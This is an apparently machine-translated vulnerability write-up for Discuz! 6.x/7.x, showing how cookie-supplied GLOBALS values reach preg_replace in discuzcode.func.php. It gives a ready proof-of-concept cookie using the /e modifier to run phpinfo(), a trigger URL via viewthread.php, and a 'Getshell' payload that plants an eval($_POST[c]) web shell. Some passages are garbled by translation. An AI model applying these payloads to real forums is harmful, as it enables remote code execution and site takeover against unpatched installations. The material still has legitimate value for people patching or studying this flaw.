Reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html
File located in: include/discuzcode.func.php 第97-241 line function Discuzcode ()
In such a word, $GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray ']
$message = preg_replace ($GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray '], $message, $maxsmilies);
In 5.3.*, however, the $_request value of this hyper-global variable is affected by Request_order in PHP.ini, and in the latest php5.3.x series, the Request_order default is GP, which means that the default configuration $_ The request contains only $_get and $_post, not $_cookie, so we can submit the Globals variable through a COOKIE. (Default is CGP in 5.3.29)
To demonstrate the vulnerability, set it to GP.
$message = preg_replace ($GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray '], $message, $maxsmilies);
A typical vulnerability. Preg_replace () The first two parameters can be controlled, but that is, we just control the first parameter is the/E mode, the second parameter is the PHP code we want to execute, we can form a backdoor.
Here's a point to note that you don't necessarily need the/E mode,
Write a script run to see what characters can be.
<?phppreg_replace ($_get[' a '). * '. $_get[' a ']. ' E ', ' phpinfo (); ', ' a ', 1)?>
Specific "" [E-mail protected]#$%^&* ()-+ etc., but pay attention to the transfer process of escaping.
Submit via Cookie: Globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=phpinfo ();
Then echo back where the Discuzcode () function is called.
Viewthread_procpost () function 第619-729 line in/viewthread.php
The Discuzcode () function was called on line No. 725
$post [' message '] = Discuzcode ($post [' message '], $post [' Smileyoff '], $post [' Bbcodeoff '], $post [' Htmlon '] & 1, $ forum[' allowsmilies ', $forum [' Allowbbcode '], ($forum [' Allowimgcode '] && $showimages? 1:0), $forum [' Allowhtml '], ($forum [' Jammer '] && $post [' Authorid ']! = $discuz _uid? 1:0), 0, $post [' Authorid '], $forum [' Allowme Diacode '], $post [' pid ']);
Call the Viewthread_procpost () function again in the first place
while ($post = $sdb->fetch_array ($query)) {if ($onlyauthoradd && $post [' anonymous '] = = 0) | |! $onlyauthoradd) {$postlist [$post [' pid '] = Viewthread_procpost ($post);}}
Come to/include/discuzcode.func.php when the value of $globals[' _dcache ' [' smilies '] is set, you can execute preg_replace (), resulting in code execution.
if (! $smileyoff && $allowsmilies &&!empty ($GLOBALS [' _dcache '] [' smilies ') && Is_array ($ globals[' _dcache ' [' smilies '])) {...}
POC: Added in the cookie: globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=phpinfo ();
Then visit either post. /VIEWTHREAD.PHP?TID=13&EXTRA=PAGE%3D1 can trigger a vulnerability.
Getsshell:globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=eval ($_post[c])%3b;
discuz! 6.x/7.x global Variable Defense bypass causes command execution